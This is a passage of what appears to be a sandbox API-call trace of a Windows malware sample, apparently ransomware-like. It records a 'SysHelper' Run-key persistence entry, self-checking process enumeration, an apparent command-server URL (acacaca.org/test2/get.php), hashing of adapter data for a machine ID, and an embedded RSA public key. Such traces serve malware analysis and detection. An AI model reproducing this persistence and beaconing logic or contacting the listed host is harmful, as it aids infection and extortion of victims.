lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0177.218] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" [0177.219] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x303528*="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0177.220] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0177.220] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76600000 [0177.221] GetProcAddress (hModule=0x76600000, lpProcName="EnumProcesses") returned 0x0 [0177.221] GetProcAddress (hModule=0x76600000, lpProcName="EnumProcessModules") returned 0x0 [0177.221] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleBaseNameW") returned 0x0 [0177.221] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74e40000 [0177.224] GetProcAddress (hModule=0x74e40000, lpProcName="EnumProcesses") returned 0x74e41544 [0177.224] GetProcAddress (hModule=0x74e40000, lpProcName="EnumProcessModules") returned 0x74e41408 [0177.225] GetProcAddress (hModule=0x74e40000, lpProcName="GetModuleBaseNameW") returned 0x74e4152c [0177.225] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0177.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0177.227] CloseHandle (hObject=0x0) returned 0 [0177.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0177.227] CloseHandle (hObject=0x0) returned 0 [0177.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0177.227] CloseHandle (hObject=0x0) returned 0 [0177.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0177.227] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1bc) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0177.228] CloseHandle (hObject=0x0) returned 0 [0177.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3e4) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x394) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x450) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x4e8 [0177.229] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0177.229] CloseHandle (hObject=0x4e8) returned 1 [0177.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x534) returned 0x0 [0177.229] CloseHandle (hObject=0x0) returned 0 [0177.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x548) returned 0x0 [0177.230] CloseHandle (hObject=0x0) returned 0 [0177.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x4e8 [0177.230] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0177.230] CloseHandle (hObject=0x4e8) returned 1 [0177.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x4e8 [0177.230] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0177.230] CloseHandle (hObject=0x4e8) returned 1 [0177.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6f8) returned 0x4e8 [0177.230] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0177.230] CloseHandle (hObject=0x4e8) returned 1 [0177.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x4e8 [0177.230] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0177.231] CloseHandle (hObject=0x4e8) returned 1 [0177.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d8) returned 0x4e8 [0177.231] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0177.233] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 0x44 [0177.233] CloseHandle (hObject=0x4e8) returned 1 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2ea210 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a08cf0 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a08f58 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a091c0 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a09428 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a09690 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a098f8 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a70f38 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a711a0 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a71408 [0177.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a71670 [0177.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e8) returned 0x0 [0177.271] RegQueryValueExW (in: hKey=0x4e8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", lpcbData=0x18ea20*=0x132) returned 0x0 [0177.271] RegCloseKey (hKey=0x4e8) returned 0x0 [0177.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x140) returned 0x2a09b60 [0177.271] lstrlenA (lpString="\" --AutoStart") returned 13 [0177.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x120) returned 0x2f5b18 [0177.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a09b60 | out: hHeap=0x2c0000) returned 1 [0177.271] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 1 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x120) returned 0x2a09b60 [0177.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2ea4e0 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a718d8 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a71b40 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a71da8 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a72010 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fbe28 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fc090 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fc2f8 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fc560 [0177.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fc7c8 [0177.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fca30 [0177.273] lstrlenA (lpString="http://acacaca.org/test2/get.php") returned 32 [0177.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x42) returned 0x2a43050 [0177.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a718d8, cbMultiByte=-1, lpWideCharStr=0x2a43050, cchWideChar=33 | out: lpWideCharStr="http://acacaca.org/test2/get.php") returned 33 [0177.273] lstrcatW (in: lpString1="", lpString2="http://acacaca.org/test2/get.php" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.273] lstrlenA (lpString="") returned 0 [0177.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7ca0 [0177.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a71b40, cbMultiByte=-1, lpWideCharStr=0x29f7ca0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.273] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.273] lstrlenA (lpString="") returned 0 [0177.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7d50 [0177.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a71da8, cbMultiByte=-1, lpWideCharStr=0x29f7d50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.273] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.273] lstrlenA (lpString="") returned 0 [0177.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7c80 [0177.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a72010, cbMultiByte=-1, lpWideCharStr=0x29f7c80, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.273] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.273] lstrlenA (lpString="") returned 0 [0177.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7cb0 [0177.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29fbe28, cbMultiByte=-1, lpWideCharStr=0x29f7cb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.274] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.274] lstrlenA (lpString="") returned 0 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7cd0 [0177.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29fc090, cbMultiByte=-1, lpWideCharStr=0x29f7cd0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.274] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.274] lstrlenA (lpString="") returned 0 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7d00 [0177.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29fc2f8, cbMultiByte=-1, lpWideCharStr=0x29f7d00, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.274] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.274] lstrlenA (lpString="") returned 0 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7d10 [0177.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29fc560, cbMultiByte=-1, lpWideCharStr=0x29f7d10, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.274] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.274] lstrlenA (lpString="") returned 0 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7cf0 [0177.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29fc7c8, cbMultiByte=-1, lpWideCharStr=0x29f7cf0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.274] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.274] lstrlenA (lpString="") returned 0 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x29f7d20 [0177.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29fca30, cbMultiByte=-1, lpWideCharStr=0x29f7d20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0177.274] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0177.274] lstrlenW (lpString="") returned 0 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2e6348 [0177.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x288) returned 0x2a72278 [0177.274] GetAdaptersInfo (in: AdapterInfo=0x2a72278, SizePointer=0x18ea04 | out: AdapterInfo=0x2a72278, SizePointer=0x18ea04) returned 0x0 [0177.299] GetAdaptersInfo (in: AdapterInfo=0x2a72278, SizePointer=0x18ea04 | out: AdapterInfo=0x2a72278, SizePointer=0x18ea04) returned 0x0 [0177.326] GetLastError () returned 0x0 [0177.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1000) returned 0x2a72508 [0177.435] GetLastError () returned 0x0 [0177.460] GetLastError () returned 0x0 [0177.462] CryptAcquireContextW (in: phProv=0x18e9d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e9d4*=0x31b6c8) returned 1 [0177.464] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e9dc | out: phHash=0x18e9dc) returned 1 [0177.464] CryptHashData (hHash=0x2ef9d0, pbData=0x2a0e190, dwDataLen=0x11, dwFlags=0x0) returned 1 [0177.464] CryptGetHashParam (in: hHash=0x2ef9d0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e9d8) returned 1 [0177.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2e6368 [0177.464] CryptGetHashParam (in: hHash=0x2ef9d0, dwParam=0x2, pbData=0x2e6368, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x2e6368, pdwDataLen=0x18e9d8) returned 1 [0177.464] GetLastError () returned 0x0 [0177.464] CryptDestroyHash (hHash=0x2ef9d0) returned 1 [0177.464] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0177.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e190 | out: hHeap=0x2c0000) returned 1 [0177.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42190 [0177.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x308f80 | out: hHeap=0x2c0000) returned 1 [0177.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b28 | out: hHeap=0x2c0000) returned 1 [0177.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x5d4) returned 0x4f8 [0177.729] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0xffffffff) returned 0x0 [0178.161] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x4ec [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2ea510 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fcc98 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fcf00 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fd168 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fd3d0 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fd638 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fd8a0 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fdb08 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fdd70 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fdfd8 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fe240 [0178.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3e0) returned 0x2a73d20 [0178.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5ec) returned 0x2a74108 [0178.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2a74108, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0178.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5f0) returned 0x2a74700 [0178.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74108 | out: hHeap=0x2c0000) returned 1 [0178.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.184] CryptAcquireContextW (in: phProv=0x18ea44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ea44*=0x31b6c8) returned 1 [0178.185] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ea48 | out: phHash=0x18ea48) returned 1 [0178.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0178.185] CryptHashData (hHash=0x2ef9d0, pbData=0x2a74700, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0178.185] CryptGetHashParam (in: hHash=0x2ef9d0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ea4c) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26608 [0178.185] CryptGetHashParam (in: hHash=0x2ef9d0, dwParam=0x2, pbData=0x2a26608, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x2a26608, pdwDataLen=0x18ea4c) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x34) returned 0x2a05d68 [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="", lpString2="B0" | out: lpString1="B0") returned="B0" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B0", lpString2="2C" | out: lpString1="B02C") returned="B02C" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C", lpString2="80" | out: lpString1="B02C80") returned="B02C80" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80", lpString2="DC" | out: lpString1="B02C80DC") returned="B02C80DC" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC", lpString2="8F" | out: lpString1="B02C80DC8F") returned="B02C80DC8F" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8F", lpString2="EB" | out: lpString1="B02C80DC8FEB") returned="B02C80DC8FEB" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8FEB", lpString2="F5" | out: lpString1="B02C80DC8FEBF5") returned="B02C80DC8FEBF5" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8FEBF5", lpString2="87" | out: lpString1="B02C80DC8FEBF587") returned="B02C80DC8FEBF587" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8FEBF587", lpString2="A0" | out: lpString1="B02C80DC8FEBF587A0") returned="B02C80DC8FEBF587A0" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8FEBF587A0", lpString2="F6" | out: lpString1="B02C80DC8FEBF587A0F6") returned="B02C80DC8FEBF587A0F6" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F6", lpString2="2E" | out: lpString1="B02C80DC8FEBF587A0F62E") returned="B02C80DC8FEBF587A0F62E" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: 